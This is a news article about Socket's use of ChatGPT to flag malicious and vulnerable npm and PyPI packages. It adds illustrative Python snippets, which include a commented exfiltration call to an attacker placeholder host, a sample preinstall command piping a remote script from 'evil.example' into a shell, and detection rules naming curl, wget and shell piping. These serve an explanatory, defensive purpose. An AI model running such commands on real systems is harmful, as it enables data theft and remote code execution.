Exclusive Machine learning models are unreliable, but that doesn’t stop them from being useful at times.
According to Socket CEO Feross Aboukhadijeh, the results have been surprisingly good. “It worked way better than expected,” he told The Register via email. “We currently have a backlog of hundreds of vulnerabilities and malware packages, and we’re rushing to report them as fast as we can.”
According to Aboukhadijeh, Socket has identified 227 vulnerabilities, all using ChatGPT. The flagged issues span a variety of categories, with no single common characteristic.
The Register was shown a number of examples of public packages exhibiting malicious or insecure behavior, including information disclosure, SQL injection, hardcoded credentials, potential privilege escalation, and backdoors.
We were asked not to share some of the examples because they haven’t been taken down yet, but here are a few that have already been dealt with.
mathjs-min: “Socket reported this to npm and it has been removed,” said Aboukhadijeh. “This one was pretty bad.”
- AI analysis: “This script contains a Discord token grabber function, which poses a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
“There were also some interesting cases where a human might have been persuaded to let the code pass, but the AI flagged it as a risk,” Aboukhadijeh added.

“These decisions are somewhat subjective, but the AI isn’t deterred by comments claiming that the dangerous parts of the code are benign, even by humorous comments.”
- AI analysis: “The script collects information such as the hostname, username, home directory, and current working directory, and sends it to a remote server. The author claims it is intended for bug bounty purposes, but this behavior can still pose a privacy risk. The script also contains blocking operations that may cause performance issues and unresponsiveness.”
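To make the flagged behavior concrete, here is a hypothetical sketch, not code from any real package, of the kind of install-time telemetry collection described in the analysis above. The function name is invented for illustration; the exfiltration step is shown only as a comment.

```python
# Hypothetical illustration only -- not code from any real package.
# It gathers the same host details the flagged script collected; an
# actual malicious script would then POST the payload to a remote server.
import getpass
import os
import socket

def build_telemetry_payload():
    try:
        username = getpass.getuser()
    except Exception:          # getuser() can fail in minimal environments
        username = "unknown"
    return {
        "hostname": socket.gethostname(),
        "username": username,
        "home": os.path.expanduser("~"),
        "cwd": os.getcwd(),
    }

payload = build_telemetry_payload()
# The exfiltration step (deliberately not executed here) would look like:
#   requests.post("https://attacker.invalid/collect", json=payload)
print(sorted(payload))  # → ['cwd', 'home', 'hostname', 'username']
```

Note that the collection itself is innocuous-looking standard library code; it is the transmission to an external server that makes it malicious, which is exactly the kind of contextual judgment the AI analysis is being asked to make.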
Aboukhadijeh explained that package registries are so huge that it’s difficult to write rules that fully capture the nuances of every file, script, and bit of configuration data. Rules tend to be brittle, often producing too much noise or missing things an experienced human reviewer would catch.
While applying human analysis to the entire corpus of package registries (~1.3 million packages on npm and ~450,000 on PyPI) is impractical, machine learning models can pick up some of the slack by helping human reviewers focus on the most questionable code.
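As a rough illustration of that division of labor, a triage pass might score packages with cheap pattern rules and escalate only the highest scorers for deeper LLM or human review. The rules and weights below are a toy scheme invented for this sketch, not Socket’s actual detection logic:

```python
# Minimal triage sketch (illustrative, not Socket's real pipeline):
# brittle pattern rules score each package, and only high scorers
# are escalated for LLM analysis and human review.
import re

RULES = {
    r"child_process|subprocess": 2,   # spawning shells at install time
    r"https?://\S+": 1,               # contacting remote servers
    r"eval\(|Function\(": 3,          # dynamic code execution
    r"AKIA[0-9A-Z]{16}": 5,           # pattern resembling an AWS key
}

def risk_score(source: str) -> int:
    return sum(w for pat, w in RULES.items() if re.search(pat, source))

def triage(packages: dict, threshold: int = 3) -> list:
    """Return names of packages worth deeper (LLM/human) review."""
    return sorted(name for name, src in packages.items()
                  if risk_score(src) >= threshold)

samples = {
    "left-padish": "module.exports = s => s.padStart(10)",
    "sketchy-pkg": "require('child_process').exec('curl https://evil.example')",
}
print(triage(samples))  # → ['sketchy-pkg']
```

This also shows why rules alone are fragile: the weights are arbitrary, and obfuscated code would sail past every pattern, which is where the model-assisted review described above comes in.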
“Socket analyzes all npm and PyPI packages with AI-based source code analysis using ChatGPT,” said Aboukhadijeh.
“When we find a problem with a package, we flag it for review and ask ChatGPT to briefly explain its findings. We’re still gathering feedback on this feature.”
Aboukhadijeh provided The Register with a sample report from the ChatGPT helper identifying risky, though not definitively malicious, behavior. In this case, the machine learning model offered this assessment: “This script collects sensitive information about the user’s system, including the username, hostname, DNS servers, and package information, and sends it to an external server.”
What the ChatGPT-based Socket advisory looks like … Click to enlarge
According to Aboukhadijeh, Socket is designed to help developers make informed decisions about risk without getting in the way of their work. Warning about every install script (a common attack vector) would create too much noise, so analyzing those scripts with large language models lets Socket ring the alarm only for real problems developers should recognize. And these models are becoming more capable.
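To illustrate the noise problem, here is a minimal sketch, assuming invented helper names and an invented indicator list (this is not Socket’s real logic): every npm lifecycle script could be flagged, but only those matching risky indicators are escalated.

```python
# Sketch of the noise problem: flagging every install script drowns
# reviewers, so only scripts with risky indicators get escalated.
# Helper names and the indicator list are assumptions for illustration.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

def install_scripts(package_json: dict) -> list:
    """Pull the npm lifecycle scripts (a common attack vector)."""
    scripts = package_json.get("scripts", {})
    return [scripts[h] for h in LIFECYCLE_HOOKS if h in scripts]

def looks_risky(script: str) -> bool:
    """Crude indicator match -- a real system would go much deeper."""
    indicators = ("curl", "wget", "node -e", "powershell", "| sh")
    return any(tok in script for tok in indicators)

benign = {"scripts": {"postinstall": "node-gyp rebuild"}}
shady = {"scripts": {"preinstall": "curl https://evil.example/x.sh | sh"}}

print([looks_risky(s) for s in install_scripts(benign)])  # → [False]
print([looks_risky(s) for s in install_scripts(shady)])   # → [True]
```

A crude filter like this still misses plenty, which is why the flagged scripts are then handed to the language model for a fuller read.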
“GPT-4 is a game changer and can replace static analysis tools as long as all the relevant code is in scope,” said Aboukhadijeh.
“Theoretically, if the AI is presented with the right data, no vulnerability or security issue should go undetected. The trick is getting the right data into the AI in the right format :)” As he explains below, using these models can be costly.
“Socket provides additional data and processing to help guide GPT-4 toward a correct analysis, working within GPT’s limits on context length, references between files, which functions can be accessed, prioritization of analysis, and so on,” he said.
“Our traditional tooling actually helps make the AI better, the same way it helps humans. The AI benefits from another tool it can run on its own.”
This is not to say that large language models can’t do harm or shouldn’t face more scrutiny than ever; they can and they should. Rather, Socket’s experience suggests that ChatGPT and similar models, rough edges and all, can be genuinely useful in scenarios where the potential harm is a wrong security recommendation rather than a discriminatory hiring decision or a toxic recipe endorsement.
As open source developer Simon Willison said in a recent blog post, these large language models allow him to be more ambitious with his projects.
“As a seasoned developer, ChatGPT (and GitHub Copilot) have saved me a lot of ‘getting things done’ time,” Willison said. “Not only does this make me more productive, it lowers the bar on whether a project is worth investing time into.”
Aboukhadijeh admits that ChatGPT is not perfect. It doesn’t handle large files well due to its limited context window, and it struggles to understand heavily obfuscated code, much as human reviewers do. In both situations, though, the code warrants closer scrutiny anyway, so the model’s limitations matter less.
Aboukhadijeh said more work needs to be done to make these models resistant to prompt injection attacks and better at cross-file analysis, where pieces of malicious behavior can be spread across multiple files.
“If malicious behavior is spread widely enough, it becomes difficult to get all the context into the AI at once,” he explained. “This is fundamental to all transformer models, which have finite token limits. Our tooling tries to work within those limits by bringing different data into the AI’s context.”
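A back-of-envelope sketch of working within a finite context window might look like the following: split the files into batches that fit a token budget, highest-priority files first. The token estimate and batching policy here are illustrative assumptions, not Socket’s actual approach.

```python
# Sketch of working within a finite context window: split files into
# batches that fit a token budget, highest priority first.
# The token estimate and batching policy are illustrative assumptions.
def estimate_tokens(text: str) -> int:
    return max(1, len(text) // 4)  # rough ~4 characters per token

def batch_for_context(files, budget):
    """files: list of (name, source, priority) tuples; yields name batches."""
    batch, used = [], 0
    for name, src, _prio in sorted(files, key=lambda f: -f[2]):
        cost = estimate_tokens(src)
        if batch and used + cost > budget:
            yield batch            # this batch is full; start a new one
            batch, used = [], 0
        batch.append(name)
        used += cost
    if batch:
        yield batch

files = [("installer.js", "x" * 4000, 9),   # high priority: install script
         ("utils.js", "y" * 4000, 5),
         ("readme.md", "z" * 2000, 1)]
print(list(batch_for_context(files, budget=1500)))
# → [['installer.js'], ['utils.js', 'readme.md']]
```

The weakness Aboukhadijeh describes is visible here: malicious behavior split between installer.js and utils.js would never appear in the model’s context at the same time.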
Integrating ChatGPT and its successors into Socket’s scanner has also proved to be a financial challenge. According to Aboukhadijeh, one of the biggest obstacles to working with LLMs is the cost of deployment.
“For us, these costs proved to be the most difficult part of implementing ChatGPT at Socket,” he said. “Initial projections estimated that a full scan of the npm registry would cost millions of dollars in API usage. We were able to bring that down to a more sustainable figure.”
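For a sense of the arithmetic, here is an illustrative back-of-envelope calculation. Every figure in it is a hypothetical assumption, not Socket’s real numbers or actual API pricing; the point is only how pre-filtering changes the economics.

```python
# Illustrative back-of-envelope arithmetic only. Every figure here is a
# hypothetical assumption -- not Socket's numbers or actual API pricing.
NUM_PACKAGES = 1_300_000          # ~npm registry size cited earlier
AVG_TOKENS_PER_PACKAGE = 50_000   # assumed prompt + source tokens
PRICE_PER_1K_TOKENS = 0.03        # assumed dollars per 1,000 tokens

full_scan = NUM_PACKAGES * AVG_TOKENS_PER_PACKAGE / 1000 * PRICE_PER_1K_TOKENS
print(f"Naive full-registry scan: ${full_scan:,.0f}")   # → $1,950,000

# Cheap static pre-filtering, so only a small fraction of packages ever
# reaches the LLM, changes the economics dramatically:
FLAGGED_FRACTION = 0.02           # assumed share escalated to the model
filtered_scan = full_scan * FLAGGED_FRACTION
print(f"With pre-filtering: ${filtered_scan:,.0f}")     # → $39,000
```

Under these assumed numbers, escalating only a couple of percent of packages cuts the bill by two orders of magnitude, consistent with the traditional-tools-feed-the-AI approach described earlier.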
Asked whether client-side execution could reduce the cost of running these models, Aboukhadijeh said that while it doesn’t seem likely at the moment, the AI landscape is changing rapidly.
“The main challenges with running models locally are the frequent need to update them and the costs associated with running these models at scale,” he said. “To get the full benefit of AI for security, it’s ideal to use the largest possible model.”
“Smaller models like GPT-3 and LLaMA have some advantages, but they aren’t smart enough to consistently detect the most sophisticated malware. Running the largest models involves significant costs, but we’ve put a lot of effort into efficiency to bring those costs down. We can’t reveal all the details, as we have patents pending on some of the technology we developed for this purpose, and we continue to work on further improvements and cost reductions.”
Because of the cost, Socket has prioritized making the AI analysis available to paying customers, but the company also offers a basic version through its website.
“By centralizing this analysis in Socket, we can amortize the cost of running the AI analysis across all shared open source dependencies, providing maximum benefit to the community while protecting our customers at the lowest possible cost,” said Aboukhadijeh. ®